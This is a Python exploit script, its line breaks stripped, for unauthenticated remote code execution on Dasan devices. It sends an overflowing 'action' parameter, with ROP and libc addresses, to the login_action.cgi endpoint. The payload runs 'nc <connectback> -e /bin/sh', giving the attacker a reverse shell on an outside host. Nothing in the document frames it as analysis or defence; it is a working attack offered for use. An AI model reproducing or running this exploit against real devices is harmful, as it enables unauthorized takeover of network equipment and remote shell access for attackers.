Dasan Unauthenticated Remote Code Execution

import sysimport socketimport jsonimport timeimport structimport sslif len(sys.argv) != 4: print "Use: {} ip port connectback".format(sys.argv[0]) sys.exit(1)host = str(sys.argv[1])port = int(sys.argv[2])connectback = str(sys.argv[3])buf = 1024sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)#sock.settimeout(10)clientsocket = ssl.wrap_socket(sock)#clientsocket = sockclientsocket.connect((host, port))addr_libc = 0x2ad0c000 # 0x2ad0e000 with H640DW# rop1rop1 = addr_libc + 0x00115d40 #addiu $a0,$sp,0x18 | jalr $s0addr_rop1 = struct.pack(">i",rop1)#rop2system = addr_libc + 0x0003CC9C #systemaddr_system = struct.pack(">i",system)# execute commandcommand = "nc " + connectback + " -e /bin/sh;"payload = "A"*(756 – 0x28) + addr_system + 'C'*(0x28-8) + addr_rop1 + ';'*24 + commanddata = "action={}&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n".format(payload)http_payload = """POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: {}\r\n\r\n{}""".format(len(data),data)print http_payloadclientsocket.send(http_payload)respond_raw = clientsocket.recv(buf).strip()print respond_rawrespond_raw = clientsocket.recv(buf).strip()print respond_rawrespond_raw = clientsocket.recv(buf).strip()print respond_rawclientsocket.close()